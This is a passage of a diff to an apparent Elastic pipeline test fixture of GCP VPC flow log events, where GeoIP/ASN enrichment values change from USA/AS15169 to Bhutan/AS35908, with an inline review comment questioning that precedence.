"{\"insertId\":\"bnj3cofh3cdk8\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":52260,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:42:11.063146265Z", 
@@ -5879,6 +6136,18 @@ "id": "bnj3cofh3cdk8", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:jQQ6l4o1MZQiUFoVCT++dIYahM8=", + "bytes": 1781, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -5887,11 +6156,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -5969,7 +6243,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391475200Z", + "ingested": "2021-12-14T14:43:27.415202930Z", "original": "{\"insertId\":\"bnj3cofh3cdkp\",\"jsonPayload\":{\"bytes_sent\":\"65069\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565300944Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140119099Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140119099Z", @@ -5985,11 +6259,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -6067,7 +6346,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391480800Z", + "ingested": "2021-12-14T14:43:27.415203358Z", "original": "{\"insertId\":\"bnj3cofh3cdkc\",\"jsonPayload\":{\"bytes_sent\":\"60530\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"366\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", @@ -6089,11 +6368,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33570, 
@@ -6165,7 +6449,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391486700Z", + "ingested": "2021-12-14T14:43:27.415206690Z", "original": "{\"insertId\":\"bnj3cofh3cdkm\",\"jsonPayload\":{\"bytes_sent\":\"11384\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33570},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821047175Z\",\"packets_sent\":\"86\",\"reporter\":\"DEST\",\"rtt_msec\":\"230\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.469473010Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.469473010Z", @@ -6181,11 +6465,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33554, 
@@ -6263,7 +6552,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391492100Z", + "ingested": "2021-12-14T14:43:27.415207171Z", "original": "{\"insertId\":\"bnj3cofh3cdjy\",\"jsonPayload\":{\"bytes_sent\":\"272063\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33554,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565131125Z\",\"packets_sent\":\"247\",\"reporter\":\"SRC\",\"rtt_msec\":\"224\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.143837873Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.143837873Z", 
@@ -6274,41 +6563,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 53706, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.87.40.76", - "port": 5601, - "bytes": 1791, - "packets": 7, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:FnUL58e/2lopFxzyH6NB4ZfRZYg=", - "bytes": 1791, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -6319,6 +6573,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -6339,8 +6596,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 53706, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.87.40.76", + "port": 5601, + "bytes": 1791, + "packets": 7, + "domain": "kibana", + "ip": "10.87.40.76" + }, "event": { - "ingested": "2021-12-09T13:37:46.391497500Z", + "ingested": "2021-12-14T14:43:27.415207642Z", "original": "{\"insertId\":\"bnj3cofh3cdjv\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53706,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"43\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:43:50.703302550Z", 
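Review bot: The added `destination.geo` block now reports continent Asia, country Bhutan (`country_iso_code` BT) and `as.number` 35908 for 67.43.156.13, while the `event.original` string of the same event still carries the flow log's own `dest_location` of asn 15169, continent America, country usa; the regenerated expectation therefore encodes that the pipeline's GeoIP/ASN lookup takes precedence over the location the provider supplied. This presumably comes from the test GeoIP database used by the bumped elastic-package rather than from a deliberate pipeline change, but the precedence is worth confirming before accepting it as the oracle, because a lookup database value silently replacing the provider's `dest_location`/`src_location` data changes what `destination.as.number` and `source.geo.*` mean to anyone writing detections on them. The same substitution recurs in every later `source.geo`/`destination.geo` hunk of this file, so one decision covers all of them.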
@@ -6348,6 +6630,18 @@ "id": "bnj3cofh3cdjv", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:FnUL58e/2lopFxzyH6NB4ZfRZYg=", + "bytes": 1791, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -6362,11 +6656,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33858, 
@@ -6438,7 +6737,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391503Z", + "ingested": "2021-12-14T14:43:27.415208042Z", "original": "{\"insertId\":\"bnj3cofh3cdkh\",\"jsonPayload\":{\"bytes_sent\":\"18295\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33858},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789039435Z\",\"packets_sent\":\"118\",\"reporter\":\"DEST\",\"rtt_msec\":\"253\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.458515996Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.458515996Z", 
@@ -6449,41 +6748,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.14", - "port": 33064, - "bytes": 1467, - "ip": "67.43.156.14", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:1YXDYMIDmqablN3iIS5sgm7U7jU=", - "bytes": 1467, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -6494,6 +6758,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -6514,8 +6781,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "port": 33064, + "bytes": 1467, + "ip": "67.43.156.14", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391508400Z", + "ingested": "2021-12-14T14:43:27.415208435Z", "original": "{\"insertId\":\"bnj3cofh3cdkg\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":33064},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:44:40.125336665Z", 
@@ -6523,6 +6815,18 @@ "id": "bnj3cofh3cdkg", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:1YXDYMIDmqablN3iIS5sgm7U7jU=", + "bytes": 1467, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -6537,11 +6841,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -6613,7 +6922,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391514300Z", + "ingested": "2021-12-14T14:43:27.415208969Z", "original": "{\"insertId\":\"bnj3cofh3cdk7\",\"jsonPayload\":{\"bytes_sent\":\"165290\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", 
@@ -6624,22 +6933,57 @@ } }, { + "@timestamp": "2019-06-14T03:50:13.921Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "67.43.156.13", + "10.87.40.76" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 43 + } + } + }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 53706, 
@@ -6647,6 +6991,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415209366Z", + "original": "{\"insertId\":\"bnj3cofh3cdk9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53706},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"43\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:43:50.703302550Z", + "end": "2019-06-14T03:43:50.822333871Z", + "id": "bnj3cofh3cdk9", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -6658,7 +7012,9 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -6669,6 +7025,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -6685,25 +7044,10 @@ "vpcflow": { "reporter": "DEST", "rtt": { - "ms": 43 + "ms": 36 } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391519800Z", - "original": "{\"insertId\":\"bnj3cofh3cdk9\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53706},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:50.822333871Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"43\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:50.703302550Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:43:50.703302550Z", - "end": "2019-06-14T03:43:50.822333871Z", - "id": "bnj3cofh3cdk9", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -6712,11 +7056,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 52260, 
@@ -6724,6 +7073,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415209771Z", + "original": "{\"insertId\":\"bnj3cofh3cdkj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":52260},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:42:11.063146265Z", + "end": "2019-06-14T03:42:11.183868408Z", + "id": "bnj3cofh3cdkj", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -6735,19 +7094,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", - "10.87.40.76" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -6758,36 +7128,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391525200Z", - "original": "{\"insertId\":\"bnj3cofh3cdkj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":52260},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:42:11.183868408Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:42:11.063146265Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:42:11.063146265Z", - "end": "2019-06-14T03:42:11.183868408Z", - "id": "bnj3cofh3cdkj", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": 